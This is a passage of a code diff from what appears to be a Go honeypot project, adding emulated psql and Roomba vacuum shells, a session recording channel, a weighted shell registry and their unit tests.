// Print startup banner.
fmt.Fprint(rw, startupBanner(pgVersion))
var sqlBuf []string // accumulates multi-line SQL
for {
prompt := buildPrompt(dbName, len(sqlBuf) > 0)
if _, err := fmt.Fprint(rw, prompt); err != nil {
return nil
}
line, err := shell.ReadLine(ctx, rw)
if errors.Is(err, io.EOF) {
return nil
}
if err != nil {
return nil
}
trimmed := strings.TrimSpace(line)
// Empty line in non-buffering state: just re-prompt.
if trimmed == "" && len(sqlBuf) == 0 {
continue
}
// Backslash commands dispatch immediately (even mid-buffer they cancel the buffer).
if strings.HasPrefix(trimmed, `\`) {
sqlBuf = nil // discard any partial SQL
result := dispatchBackslash(trimmed, dbName)
if result.output != "" {
output := strings.ReplaceAll(result.output, "\n", "\r\n")
fmt.Fprintf(rw, "%s\r\n", output)
}
if sess.Store != nil {
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, result.output); err != nil {
return fmt.Errorf("append session log: %w", err)
}
}
if sess.OnCommand != nil {
sess.OnCommand("psql")
}
if result.exit {
return nil
}
continue
}
// Accumulate SQL lines.
sqlBuf = append(sqlBuf, line)
// Check if the statement is terminated by a semicolon.
if !strings.HasSuffix(strings.TrimSpace(line), ";") {
continue
}
// Full statement ready — join and dispatch.
fullSQL := strings.Join(sqlBuf, " ")
sqlBuf = nil
result := dispatchSQL(fullSQL, dbName, pgVersion)
if result.output != "" {
output := strings.ReplaceAll(result.output, "\n", "\r\n")
fmt.Fprintf(rw, "%s\r\n", output)
}
if sess.Store != nil {
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, fullSQL, result.output); err != nil {
return fmt.Errorf("append session log: %w", err)
}
}
if sess.OnCommand != nil {
sess.OnCommand("psql")
}
if result.exit {
return nil
}
}
}
// buildPrompt returns the psql prompt. continuation is true when buffering multi-line SQL.
func buildPrompt(dbName string, continuation bool) string {
if continuation {
return dbName + "-# "
}
return dbName + "=# "
}
// configString reads a string from the shell config map with a default.
func configString(cfg map[string]any, key, defaultVal string) string {
if cfg == nil {
return defaultVal
}
if v, ok := cfg[key]; ok {
if s, ok := v.(string); ok && s != "" {
return s
}
}
return defaultVal
}

View File

@@ -0,0 +1,330 @@
package psql
import (
"strings"
"testing"
)
// --- Prompt tests ---
func TestBuildPromptNormal(t *testing.T) {
got := buildPrompt("postgres", false)
if got != "postgres=# " {
t.Errorf("buildPrompt(postgres, false) = %q, want %q", got, "postgres=# ")
}
}
func TestBuildPromptContinuation(t *testing.T) {
got := buildPrompt("postgres", true)
if got != "postgres-# " {
t.Errorf("buildPrompt(postgres, true) = %q, want %q", got, "postgres-# ")
}
}
func TestBuildPromptCustomDB(t *testing.T) {
got := buildPrompt("mydb", false)
if got != "mydb=# " {
t.Errorf("buildPrompt(mydb, false) = %q, want %q", got, "mydb=# ")
}
}
// --- Backslash command dispatch tests ---
func TestBackslashQuit(t *testing.T) {
result := dispatchBackslash(`\q`, "postgres")
if !result.exit {
t.Error("\\q should set exit=true")
}
}
func TestBackslashListTables(t *testing.T) {
result := dispatchBackslash(`\dt`, "postgres")
if !strings.Contains(result.output, "users") {
t.Error("\\dt should list tables including 'users'")
}
if !strings.Contains(result.output, "sessions") {
t.Error("\\dt should list tables including 'sessions'")
}
}
func TestBackslashDescribeTable(t *testing.T) {
result := dispatchBackslash(`\d users`, "postgres")
if !strings.Contains(result.output, "username") {
t.Error("\\d users should describe users table with 'username' column")
}
if !strings.Contains(result.output, "PRIMARY KEY") {
t.Error("\\d users should include index info")
}
}
func TestBackslashDescribeUnknownTable(t *testing.T) {
result := dispatchBackslash(`\d nonexistent`, "postgres")
if !strings.Contains(result.output, "Did not find") {
t.Error("\\d nonexistent should return not found message")
}
}
func TestBackslashListDatabases(t *testing.T) {
result := dispatchBackslash(`\l`, "postgres")
if !strings.Contains(result.output, "postgres") {
t.Error("\\l should list databases including 'postgres'")
}
if !strings.Contains(result.output, "template0") {
t.Error("\\l should list databases including 'template0'")
}
}
func TestBackslashListRoles(t *testing.T) {
result := dispatchBackslash(`\du`, "postgres")
if !strings.Contains(result.output, "postgres") {
t.Error("\\du should list roles including 'postgres'")
}
if !strings.Contains(result.output, "Superuser") {
t.Error("\\du should show Superuser attribute for postgres")
}
}
func TestBackslashConnInfo(t *testing.T) {
result := dispatchBackslash(`\conninfo`, "mydb")
if !strings.Contains(result.output, "mydb") {
t.Error("\\conninfo should include database name")
}
if !strings.Contains(result.output, "5432") {
t.Error("\\conninfo should include port")
}
}
func TestBackslashHelp(t *testing.T) {
result := dispatchBackslash(`\?`, "postgres")
if !strings.Contains(result.output, `\q`) {
t.Error("\\? should include \\q in help output")
}
}
func TestBackslashSQLHelp(t *testing.T) {
result := dispatchBackslash(`\h`, "postgres")
if !strings.Contains(result.output, "SELECT") {
t.Error("\\h should include SQL commands like SELECT")
}
}
func TestBackslashUnknown(t *testing.T) {
result := dispatchBackslash(`\xyz`, "postgres")
if !strings.Contains(result.output, "Invalid command") {
t.Error("unknown backslash command should return error")
}
}
// --- SQL dispatch tests ---
func TestSQLSelectVersion(t *testing.T) {
result := dispatchSQL("SELECT version();", "postgres", "15.4")
if !strings.Contains(result.output, "15.4") {
t.Error("SELECT version() should contain pg version")
}
if !strings.Contains(result.output, "(1 row)") {
t.Error("SELECT version() should show row count")
}
}
func TestSQLSelectCurrentDatabase(t *testing.T) {
result := dispatchSQL("SELECT current_database();", "mydb", "15.4")
if !strings.Contains(result.output, "mydb") {
t.Error("SELECT current_database() should return db name")
}
}
func TestSQLSelectCurrentUser(t *testing.T) {
result := dispatchSQL("SELECT current_user;", "postgres", "15.4")
if !strings.Contains(result.output, "postgres") {
t.Error("SELECT current_user should return postgres")
}
}
func TestSQLSelectNow(t *testing.T) {
result := dispatchSQL("SELECT now();", "postgres", "15.4")
if !strings.Contains(result.output, "(1 row)") {
t.Error("SELECT now() should show row count")
}
}
func TestSQLSelectOne(t *testing.T) {
result := dispatchSQL("SELECT 1;", "postgres", "15.4")
if !strings.Contains(result.output, "1") {
t.Error("SELECT 1 should return 1")
}
}
func TestSQLInsert(t *testing.T) {
result := dispatchSQL("INSERT INTO users (name) VALUES ('test');", "postgres", "15.4")
if result.output != "INSERT 0 1" {
t.Errorf("INSERT output = %q, want %q", result.output, "INSERT 0 1")
}
}
func TestSQLUpdate(t *testing.T) {
result := dispatchSQL("UPDATE users SET name = 'foo';", "postgres", "15.4")
if result.output != "UPDATE 1" {
t.Errorf("UPDATE output = %q, want %q", result.output, "UPDATE 1")
}
}
func TestSQLDelete(t *testing.T) {
result := dispatchSQL("DELETE FROM users WHERE id = 1;", "postgres", "15.4")
if result.output != "DELETE 1" {
t.Errorf("DELETE output = %q, want %q", result.output, "DELETE 1")
}
}
func TestSQLCreateTable(t *testing.T) {
result := dispatchSQL("CREATE TABLE test (id int);", "postgres", "15.4")
if result.output != "CREATE TABLE" {
t.Errorf("CREATE TABLE output = %q, want %q", result.output, "CREATE TABLE")
}
}
func TestSQLCreateDatabase(t *testing.T) {
result := dispatchSQL("CREATE DATABASE testdb;", "postgres", "15.4")
if result.output != "CREATE DATABASE" {
t.Errorf("CREATE DATABASE output = %q, want %q", result.output, "CREATE DATABASE")
}
}
func TestSQLDropTable(t *testing.T) {
result := dispatchSQL("DROP TABLE test;", "postgres", "15.4")
if result.output != "DROP TABLE" {
t.Errorf("DROP TABLE output = %q, want %q", result.output, "DROP TABLE")
}
}
func TestSQLAlterTable(t *testing.T) {
result := dispatchSQL("ALTER TABLE users ADD COLUMN age int;", "postgres", "15.4")
if result.output != "ALTER TABLE" {
t.Errorf("ALTER TABLE output = %q, want %q", result.output, "ALTER TABLE")
}
}
func TestSQLBeginCommitRollback(t *testing.T) {
tests := []struct {
sql string
want string
}{
{"BEGIN;", "BEGIN"},
{"COMMIT;", "COMMIT"},
{"ROLLBACK;", "ROLLBACK"},
}
for _, tt := range tests {
result := dispatchSQL(tt.sql, "postgres", "15.4")
if result.output != tt.want {
t.Errorf("dispatchSQL(%q) = %q, want %q", tt.sql, result.output, tt.want)
}
}
}
func TestSQLShowServerVersion(t *testing.T) {
result := dispatchSQL("SHOW server_version;", "postgres", "15.4")
if !strings.Contains(result.output, "15.4") {
t.Error("SHOW server_version should contain version")
}
}
func TestSQLShowSearchPath(t *testing.T) {
result := dispatchSQL("SHOW search_path;", "postgres", "15.4")
if !strings.Contains(result.output, "public") {
t.Error("SHOW search_path should contain public")
}
}
func TestSQLSet(t *testing.T) {
result := dispatchSQL("SET client_encoding = 'UTF8';", "postgres", "15.4")
if result.output != "SET" {
t.Errorf("SET output = %q, want %q", result.output, "SET")
}
}
func TestSQLUnrecognized(t *testing.T) {
result := dispatchSQL("FOOBAR baz;", "postgres", "15.4")
if !strings.Contains(result.output, "ERROR") {
t.Error("unrecognized SQL should return error")
}
if !strings.Contains(result.output, "FOOBAR") {
t.Error("error should reference the offending token")
}
}
// --- Case insensitivity ---
func TestSQLCaseInsensitive(t *testing.T) {
result := dispatchSQL("select version();", "postgres", "15.4")
if !strings.Contains(result.output, "15.4") {
t.Error("select version() (lowercase) should work")
}
result = dispatchSQL("Select Current_Database();", "mydb", "15.4")
if !strings.Contains(result.output, "mydb") {
t.Error("mixed case SELECT should work")
}
}
// --- Startup banner ---
func TestStartupBanner(t *testing.T) {
banner := startupBanner("15.4")
if !strings.Contains(banner, "psql (15.4)") {
t.Errorf("banner should contain version, got: %s", banner)
}
if !strings.Contains(banner, "help") {
t.Error("banner should mention help")
}
}
// --- configString ---
func TestConfigString(t *testing.T) {
cfg := map[string]any{"db_name": "mydb"}
if got := configString(cfg, "db_name", "postgres"); got != "mydb" {
t.Errorf("configString() = %q, want %q", got, "mydb")
}
if got := configString(cfg, "missing", "default"); got != "default" {
t.Errorf("configString() for missing = %q, want %q", got, "default")
}
if got := configString(nil, "key", "default"); got != "default" {
t.Errorf("configString(nil) = %q, want %q", got, "default")
}
}
// --- Shell metadata ---
func TestShellNameAndDescription(t *testing.T) {
s := NewPsqlShell()
if s.Name() != "psql" {
t.Errorf("Name() = %q, want %q", s.Name(), "psql")
}
if s.Description() == "" {
t.Error("Description() should not be empty")
}
}
// --- formatSingleValue ---
func TestFormatSingleValue(t *testing.T) {
out := formatSingleValue("?column?", "1")
if !strings.Contains(out, "?column?") {
t.Error("should contain column name")
}
if !strings.Contains(out, "1") {
t.Error("should contain value")
}
if !strings.Contains(out, "(1 row)") {
t.Error("should contain row count")
}
}
// --- \d with no args ---
func TestBackslashDescribeNoArgs(t *testing.T) {
result := dispatchBackslash(`\d`, "postgres")
if !strings.Contains(result.output, "users") {
t.Error("\\d with no args should list tables")
}
}

View File

@@ -0,0 +1,62 @@
package shell
import (
"io"
"time"
)
// EventCallback is called with a copy of data whenever the channel is read or written.
// direction is 0 for input (client→server) and 1 for output (server→client).
type EventCallback func(ts time.Time, direction int, data []byte)
// RecordingChannel wraps an io.ReadWriteCloser and optionally invokes callbacks
// on every Read (input) and Write (output).
type RecordingChannel struct {
inner io.ReadWriteCloser
callbacks []EventCallback
}
// NewRecordingChannel returns a RecordingChannel wrapping rw.
func NewRecordingChannel(rw io.ReadWriteCloser) *RecordingChannel {
return &RecordingChannel{inner: rw}
}
// WithCallback clears existing callbacks, sets the given one, and returns the
// RecordingChannel for chaining. Kept for backward compatibility.
func (r *RecordingChannel) WithCallback(cb EventCallback) *RecordingChannel {
r.callbacks = []EventCallback{cb}
return r
}
// AddCallback appends an additional event callback.
func (r *RecordingChannel) AddCallback(cb EventCallback) {
r.callbacks = append(r.callbacks, cb)
}
func (r *RecordingChannel) Read(p []byte) (int, error) {
n, err := r.inner.Read(p)
if n > 0 && len(r.callbacks) > 0 {
ts := time.Now()
cp := make([]byte, n)
copy(cp, p[:n])
for _, cb := range r.callbacks {
cb(ts, 0, cp)
}
}
return n, err
}
func (r *RecordingChannel) Write(p []byte) (int, error) {
n, err := r.inner.Write(p)
if n > 0 && len(r.callbacks) > 0 {
ts := time.Now()
cp := make([]byte, n)
copy(cp, p[:n])
for _, cb := range r.callbacks {
cb(ts, 1, cp)
}
}
return n, err
}
func (r *RecordingChannel) Close() error { return r.inner.Close() }

View File

@@ -0,0 +1,122 @@
package shell
import (
"bytes"
"io"
"sync"
"testing"
"time"
)
// nopCloser wraps a ReadWriter with a no-op Close.
type nopCloser struct {
io.ReadWriter
}
func (nopCloser) Close() error { return nil }
func TestRecordingChannelPassthrough(t *testing.T) {
var buf bytes.Buffer
rc := NewRecordingChannel(nopCloser{&buf})
// Write through the recorder.
msg := []byte("hello")
n, err := rc.Write(msg)
if err != nil {
t.Fatalf("Write: %v", err)
}
if n != len(msg) {
t.Errorf("Write n = %d, want %d", n, len(msg))
}
// Read through the recorder.
out := make([]byte, 16)
n, err = rc.Read(out)
if err != nil {
t.Fatalf("Read: %v", err)
}
if string(out[:n]) != "hello" {
t.Errorf("Read = %q, want %q", out[:n], "hello")
}
if err := rc.Close(); err != nil {
t.Fatalf("Close: %v", err)
}
}
func TestRecordingChannelMultiCallback(t *testing.T) {
var buf bytes.Buffer
rc := NewRecordingChannel(nopCloser{&buf})
type event struct {
ts time.Time
direction int
data string
}
var mu sync.Mutex
var events1, events2 []event
rc.AddCallback(func(ts time.Time, direction int, data []byte) {
mu.Lock()
defer mu.Unlock()
events1 = append(events1, event{ts, direction, string(data)})
})
rc.AddCallback(func(ts time.Time, direction int, data []byte) {
mu.Lock()
defer mu.Unlock()
events2 = append(events2, event{ts, direction, string(data)})
})
// Write triggers both callbacks with direction=1.
rc.Write([]byte("hello"))
// Read triggers both callbacks with direction=0.
out := make([]byte, 16)
rc.Read(out)
mu.Lock()
defer mu.Unlock()
if len(events1) != 2 {
t.Fatalf("callback1 got %d events, want 2", len(events1))
}
if len(events2) != 2 {
t.Fatalf("callback2 got %d events, want 2", len(events2))
}
// Write event should be direction=1.
if events1[0].direction != 1 {
t.Errorf("write direction = %d, want 1", events1[0].direction)
}
// Read event should be direction=0.
if events1[1].direction != 0 {
t.Errorf("read direction = %d, want 0", events1[1].direction)
}
// Both callbacks should get the same timestamp for a single operation.
if events1[0].ts != events2[0].ts {
t.Error("callbacks should receive the same timestamp")
}
}
func TestRecordingChannelWithCallbackClearsExisting(t *testing.T) {
var buf bytes.Buffer
rc := NewRecordingChannel(nopCloser{&buf})
called1 := false
called2 := false
rc.AddCallback(func(_ time.Time, _ int, _ []byte) { called1 = true })
// WithCallback should clear existing and set new.
rc.WithCallback(func(_ time.Time, _ int, _ []byte) { called2 = true })
rc.Write([]byte("x"))
if called1 {
t.Error("first callback should not be called after WithCallback")
}
if !called2 {
t.Error("second callback should be called")
}
}

View File

@@ -0,0 +1,84 @@
package shell
import (
"errors"
"fmt"
"math/rand/v2"
"sync"
)
type registryEntry struct {
shell Shell
weight int
}
// Registry holds shells with associated weights for random selection.
type Registry struct {
mu sync.RWMutex
entries []registryEntry
}
// NewRegistry returns an empty Registry.
func NewRegistry() *Registry {
return &Registry{}
}
// Register adds a shell with the given weight. Weight must be >= 1 and
// no duplicate names are allowed.
func (r *Registry) Register(shell Shell, weight int) error {
if weight < 1 {
return fmt.Errorf("weight must be >= 1, got %d", weight)
}
r.mu.Lock()
defer r.mu.Unlock()
for _, e := range r.entries {
if e.shell.Name() == shell.Name() {
return fmt.Errorf("shell %q already registered", shell.Name())
}
}
r.entries = append(r.entries, registryEntry{shell: shell, weight: weight})
return nil
}
// Select picks a shell using weighted random selection.
func (r *Registry) Select() (Shell, error) {
r.mu.RLock()
defer r.mu.RUnlock()
if len(r.entries) == 0 {
return nil, errors.New("no shells registered")
}
total := 0
for _, e := range r.entries {
total += e.weight
}
pick := rand.IntN(total)
cumulative := 0
for _, e := range r.entries {
cumulative += e.weight
if pick < cumulative {
return e.shell, nil
}
}
// Should never reach here, but return last entry as fallback.
return r.entries[len(r.entries)-1].shell, nil
}
// Get returns a shell by name.
func (r *Registry) Get(name string) (Shell, bool) {
r.mu.RLock()
defer r.mu.RUnlock()
for _, e := range r.entries {
if e.shell.Name() == name {
return e.shell, true
}
}
return nil, false
}

View File

@@ -0,0 +1,107 @@
package shell
import (
"context"
"io"
"testing"
)
// stubShell implements Shell for testing.
type stubShell struct {
name string
}
func (s *stubShell) Name() string { return s.name }
func (s *stubShell) Description() string { return "stub" }
func (s *stubShell) Handle(_ context.Context, _ *SessionContext, _ io.ReadWriteCloser) error {
return nil
}
func TestRegistryRegisterAndGet(t *testing.T) {
r := NewRegistry()
sh := &stubShell{name: "test"}
if err := r.Register(sh, 1); err != nil {
t.Fatalf("Register: %v", err)
}
got, ok := r.Get("test")
if !ok {
t.Fatal("Get returned false")
}
if got.Name() != "test" {
t.Errorf("Name = %q, want %q", got.Name(), "test")
}
}
func TestRegistryGetMissing(t *testing.T) {
r := NewRegistry()
_, ok := r.Get("nope")
if ok {
t.Fatal("Get returned true for missing shell")
}
}
func TestRegistryDuplicateName(t *testing.T) {
r := NewRegistry()
r.Register(&stubShell{name: "dup"}, 1)
err := r.Register(&stubShell{name: "dup"}, 1)
if err == nil {
t.Fatal("expected error for duplicate name")
}
}
func TestRegistryInvalidWeight(t *testing.T) {
r := NewRegistry()
err := r.Register(&stubShell{name: "a"}, 0)
if err == nil {
t.Fatal("expected error for weight 0")
}
err = r.Register(&stubShell{name: "b"}, -1)
if err == nil {
t.Fatal("expected error for negative weight")
}
}
func TestRegistrySelectEmpty(t *testing.T) {
r := NewRegistry()
_, err := r.Select()
if err == nil {
t.Fatal("expected error from empty registry")
}
}
func TestRegistrySelectSingle(t *testing.T) {
r := NewRegistry()
r.Register(&stubShell{name: "only"}, 1)
for range 10 {
sh, err := r.Select()
if err != nil {
t.Fatalf("Select: %v", err)
}
if sh.Name() != "only" {
t.Errorf("Name = %q, want %q", sh.Name(), "only")
}
}
}
func TestRegistrySelectWeighted(t *testing.T) {
r := NewRegistry()
r.Register(&stubShell{name: "heavy"}, 100)
r.Register(&stubShell{name: "light"}, 1)
counts := map[string]int{}
for range 1000 {
sh, err := r.Select()
if err != nil {
t.Fatalf("Select: %v", err)
}
counts[sh.Name()]++
}
// "heavy" has weight 100 vs "light" weight 1, so heavy should get ~99%.
if counts["heavy"] < 900 {
t.Errorf("heavy selected %d/1000 times, expected >900", counts["heavy"])
}
}

View File

@@ -0,0 +1,463 @@
package roomba
import (
"context"
"errors"
"fmt"
"io"
"slices"
"strings"
"time"
"code.t-juice.club/torjus/oubliette/internal/shell"
)
const sessionTimeout = 5 * time.Minute
// RoombaShell emulates an iRobot Roomba vacuum robot interface.
type RoombaShell struct{}
// NewRoombaShell returns a new RoombaShell instance.
func NewRoombaShell() *RoombaShell {
return &RoombaShell{}
}
func (r *RoombaShell) Name() string { return "roomba" }
func (r *RoombaShell) Description() string { return "iRobot Roomba shell emulator" }
func (r *RoombaShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
defer cancel()
state := newRoombaState()
banner := strings.ReplaceAll(bootBanner(), "\n", "\r\n")
fmt.Fprint(rw, banner)
for {
if _, err := fmt.Fprint(rw, "RoombaOS> "); err != nil {
return nil
}
line, err := shell.ReadLine(ctx, rw)
if errors.Is(err, io.EOF) {
fmt.Fprint(rw, "logout\r\n")
return nil
}
if err != nil {
return nil
}
trimmed := strings.TrimSpace(line)
if trimmed == "" {
continue
}
result := state.dispatch(trimmed)
var output string
if result.output != "" {
output = result.output
output = strings.ReplaceAll(output, "\r\n", "\n")
output = strings.ReplaceAll(output, "\n", "\r\n")
fmt.Fprintf(rw, "%s\r\n", output)
}
if sess.Store != nil {
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output); err != nil {
return fmt.Errorf("append session log: %w", err)
}
}
if sess.OnCommand != nil {
sess.OnCommand("roomba")
}
if result.exit {
return nil
}
}
}
func bootBanner() string {
return `
____ _ ___ ____
| _ \ ___ ___ _ __ ___ | |__ __ _ / _ \/ ___|
| |_) / _ \ / _ \| '_ ` + "`" + ` _ \| '_ \ / _` + "`" + ` | | | \___ \
| _ < (_) | (_) | | | | | | |_) | (_| | |_| |___) |
|_| \_\___/ \___/|_| |_| |_|_.__/ \__,_|\___/|____/
iRobot Roomba j7+ | RoombaOS v4.3.7
Serial: RMB-7291-J7P-0482 | Firmware: 4.3.7-stable
Battery: 73% | WiFi: Connected (SmartHome-5G)
Type 'help' for available commands.
`
}
type room struct {
name string
areaSqFt int
lastCleaned time.Time
}
type scheduleEntry struct {
day string
time string
}
type historyEntry struct {
timestamp time.Time
room string
duration string
note string
}
type roombaState struct {
battery int
dustbin int
status string
rooms []room
schedule []scheduleEntry
cleanHistory []historyEntry
}
type commandResult struct {
output string
exit bool
}
func newRoombaState() *roombaState {
now := time.Now()
return &roombaState{
battery: 73,
dustbin: 61,
status: "Docked",
rooms: []room{
{"Kitchen", 180, now.Add(-2 * time.Hour)},
{"Living Room", 320, now.Add(-5 * time.Hour)},
{"Bedroom", 200, now.Add(-26 * time.Hour)},
{"Hallway", 60, now.Add(-5 * time.Hour)},
{"Bathroom", 75, now.Add(-50 * time.Hour)},
{"Cat's Room", 110, now.Add(-3 * time.Hour)},
},
schedule: []scheduleEntry{
{"Monday", "09:00"},
{"Wednesday", "09:00"},
{"Friday", "09:00"},
{"Saturday", "14:00"},
},
cleanHistory: []historyEntry{
{now.Add(-2 * time.Hour), "Kitchen", "23 min", "Completed normally"},
{now.Add(-3 * time.Hour), "Cat's Room", "18 min", "Cat detected - rerouting"},
{now.Add(-5 * time.Hour), "Living Room", "34 min", "Encountered sock near couch"},
{now.Add(-5*time.Hour - 40*time.Minute), "Hallway", "8 min", "Completed normally"},
{now.Add(-26 * time.Hour), "Bedroom", "27 min", "Tangled in phone charger"},
{now.Add(-50 * time.Hour), "Bathroom", "14 min", "Unidentified sticky substance detected"},
},
}
}
func (s *roombaState) dispatch(input string) commandResult {
parts := strings.Fields(input)
if len(parts) == 0 {
return commandResult{}
}
cmd := strings.ToLower(parts[0])
args := parts[1:]
switch cmd {
case "help":
return s.cmdHelp()
case "status":
return s.cmdStatus()
case "clean":
return s.cmdClean(args)
case "dock":
return s.cmdDock()
case "map":
return s.cmdMap()
case "schedule":
return s.cmdSchedule(args)
case "history":
return s.cmdHistory()
case "diagnostics":
return s.cmdDiagnostics()
case "alerts":
return s.cmdAlerts()
case "reboot":
return s.cmdReboot()
case "exit", "logout":
return commandResult{output: "Disconnecting from RoombaOS. Happy cleaning!", exit: true}
default:
return commandResult{output: fmt.Sprintf("RoombaOS: unknown command '%s'. Type 'help' for available commands.", cmd)}
}
}
func (s *roombaState) cmdHelp() commandResult {
help := `Available commands:
help - Show this help message
status - Show robot status
clean - Start full cleaning job
clean room <name> - Clean a specific room
dock - Return to dock
map - Show floor plan and room list
schedule - List cleaning schedule
schedule add <day> <time> - Add scheduled cleaning
schedule remove <day> - Remove scheduled cleaning
history - Show recent cleaning history
diagnostics - Run system diagnostics
alerts - Show active alerts
reboot - Reboot RoombaOS
exit / logout - Disconnect`
return commandResult{output: help}
}
func (s *roombaState) cmdStatus() commandResult {
var b strings.Builder
b.WriteString("=== RoombaOS System Status ===\n")
b.WriteString("Model: iRobot Roomba j7+\n")
b.WriteString(fmt.Sprintf("Status: %s\n", s.status))
b.WriteString(fmt.Sprintf("Battery: %d%%\n", s.battery))
b.WriteString(fmt.Sprintf("Dustbin: %d%% full\n", s.dustbin))
b.WriteString("Side brush: OK (142 hrs)\n")
b.WriteString("Main brush: OK (98 hrs)\n")
b.WriteString("\n")
b.WriteString("WiFi: Connected (SmartHome-5G)\n")
b.WriteString("Signal: -38 dBm\n")
b.WriteString("Alexa: Linked\n")
b.WriteString("Google Home: Linked\n")
b.WriteString("iRobot Home App: Connected\n")
b.WriteString("\n")
b.WriteString("Firmware: v4.3.7-stable\n")
b.WriteString("LIDAR: Operational\n")
b.WriteString("Clean Area Total: 12,847 sq ft (lifetime)")
return commandResult{output: b.String()}
}
func (s *roombaState) cmdClean(args []string) commandResult {
if s.status == "Cleaning" {
return commandResult{output: "Already cleaning. Use 'dock' to cancel and return to dock."}
}
if len(args) >= 2 && strings.ToLower(args[0]) == "room" {
roomName := strings.Join(args[1:], " ")
for _, r := range s.rooms {
if strings.EqualFold(r.name, roomName) {
s.status = "Cleaning"
return commandResult{output: fmt.Sprintf(
"Starting targeted clean: %s (%d sq ft)\nEstimated time: %d minutes\nUndocking... navigating to %s...",
r.name, r.areaSqFt, r.areaSqFt/8, r.name,
)}
}
}
return commandResult{output: fmt.Sprintf("Room '%s' not found. Use 'map' to see available rooms.", roomName)}
}
if len(args) > 0 {
return commandResult{output: "Usage: clean [room <name>]"}
}
s.status = "Cleaning"
var totalArea int
for _, r := range s.rooms {
totalArea += r.areaSqFt
}
return commandResult{output: fmt.Sprintf(
"Starting full house clean\nTotal area: %d sq ft across %d rooms\nEstimated time: %d minutes\nUndocking... beginning clean cycle...",
totalArea, len(s.rooms), totalArea/8,
)}
}
func (s *roombaState) cmdDock() commandResult {
if s.status == "Docked" {
return commandResult{output: "Already docked."}
}
if s.status == "Returning to dock" {
return commandResult{output: "Already returning to dock."}
}
s.status = "Returning to dock"
return commandResult{output: "Cancelling current job. Returning to dock...\nEstimated arrival: 2 minutes"}
}
func (s *roombaState) cmdMap() commandResult {
var b strings.Builder
b.WriteString("=== Floor Plan ===\n\n")
b.WriteString(" +------------+----------+\n")
b.WriteString(" | | |\n")
b.WriteString(" | Kitchen | Bathroom |\n")
b.WriteString(" | 180sqft | 75sqft |\n")
b.WriteString(" | | |\n")
b.WriteString(" +------+-----+----+-----+\n")
b.WriteString(" | | | |\n")
b.WriteString(" | Hall | Living | Cat |\n")
b.WriteString(" | 60sf | Room | Rm |\n")
b.WriteString(" | | 320sqft |110sf|\n")
b.WriteString(" +------+ +-----+\n")
b.WriteString(" | | |\n")
b.WriteString(" | Bed +----------+\n")
b.WriteString(" | room | [DOCK]\n")
b.WriteString(" |200sf |\n")
b.WriteString(" +------+\n")
b.WriteString("\nRoom Details:\n")
b.WriteString(fmt.Sprintf(" %-15s %-10s %s\n", "ROOM", "AREA", "LAST CLEANED"))
b.WriteString(fmt.Sprintf(" %-15s %-10s %s\n", "----", "----", "------------"))
for _, r := range s.rooms {
ago := time.Since(r.lastCleaned).Truncate(time.Minute)
b.WriteString(fmt.Sprintf(" %-15s %-10s %s ago\n", r.name, fmt.Sprintf("%d sqft", r.areaSqFt), formatDuration(ago)))
}
return commandResult{output: b.String()}
}
func (s *roombaState) cmdSchedule(args []string) commandResult {
if len(args) == 0 {
return s.scheduleList()
}
sub := strings.ToLower(args[0])
switch sub {
case "add":
if len(args) < 3 {
return commandResult{output: "Usage: schedule add <day> <time>\nExample: schedule add Tuesday 10:00"}
}
return s.scheduleAdd(args[1], args[2])
case "remove":
if len(args) < 2 {
return commandResult{output: "Usage: schedule remove <day>"}
}
return s.scheduleRemove(args[1])
default:
return commandResult{output: fmt.Sprintf("Unknown schedule subcommand '%s'. Try: add, remove", sub)}
}
}
func (s *roombaState) scheduleList() commandResult {
if len(s.schedule) == 0 {
return commandResult{output: "No cleaning schedule configured."}
}
var b strings.Builder
b.WriteString("=== Cleaning Schedule ===\n")
b.WriteString(fmt.Sprintf(" %-12s %s\n", "DAY", "TIME"))
b.WriteString(fmt.Sprintf(" %-12s %s\n", "---", "----"))
for _, e := range s.schedule {
b.WriteString(fmt.Sprintf(" %-12s %s\n", e.day, e.time))
}
b.WriteString(fmt.Sprintf("\n%d scheduled cleaning(s)", len(s.schedule)))
return commandResult{output: b.String()}
}
func (s *roombaState) scheduleAdd(day, t string) commandResult {
day = capitalizeFirst(strings.ToLower(day))
validDays := []string{"Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"}
if !slices.Contains(validDays, day) {
return commandResult{output: fmt.Sprintf("Invalid day '%s'. Use a day of the week (e.g. Monday, Tuesday).", day)}
}
for _, e := range s.schedule {
if strings.EqualFold(e.day, day) {
return commandResult{output: fmt.Sprintf("Schedule for %s already exists. Remove it first.", day)}
}
}
s.schedule = append(s.schedule, scheduleEntry{day: day, time: t})
return commandResult{output: fmt.Sprintf("Scheduled cleaning added: %s at %s", day, t)}
}
func (s *roombaState) scheduleRemove(day string) commandResult {
day = capitalizeFirst(strings.ToLower(day))
for i, e := range s.schedule {
if strings.EqualFold(e.day, day) {
s.schedule = append(s.schedule[:i], s.schedule[i+1:]...)
return commandResult{output: fmt.Sprintf("Removed schedule for %s.", day)}
}
}
return commandResult{output: fmt.Sprintf("No schedule found for '%s'.", day)}
}
func (s *roombaState) cmdHistory() commandResult {
if len(s.cleanHistory) == 0 {
return commandResult{output: "No cleaning history."}
}
var b strings.Builder
b.WriteString("=== Cleaning History ===\n")
b.WriteString(fmt.Sprintf(" %-20s %-15s %-10s %s\n", "TIME", "ROOM", "DURATION", "NOTE"))
b.WriteString(fmt.Sprintf(" %-20s %-15s %-10s %s\n", "----", "----", "--------", "----"))
for _, h := range s.cleanHistory {
ts := h.timestamp.Format("2006-01-02 15:04")
b.WriteString(fmt.Sprintf(" %-20s %-15s %-10s %s\n", ts, h.room, h.duration, h.note))
}
b.WriteString(fmt.Sprintf("\n%d session(s) recorded", len(s.cleanHistory)))
return commandResult{output: b.String()}
}
func (s *roombaState) cmdDiagnostics() commandResult {
diag := `Running RoombaOS diagnostics...
[1/8] Cliff sensors........... OK
[2/8] Bumper sensor........... OK
[3/8] Side brush motor........ OK (142 hrs until replacement)
[4/8] Main brush motor........ OK (98 hrs until replacement)
[5/8] Wheel motors............ OK (L: 1204 hrs, R: 1204 hrs)
[6/8] LIDAR module............ OK (last calibrated 3 days ago)
[7/8] Dustbin sensor.......... OK
[8/8] WiFi module............. OK (signal: -38 dBm)
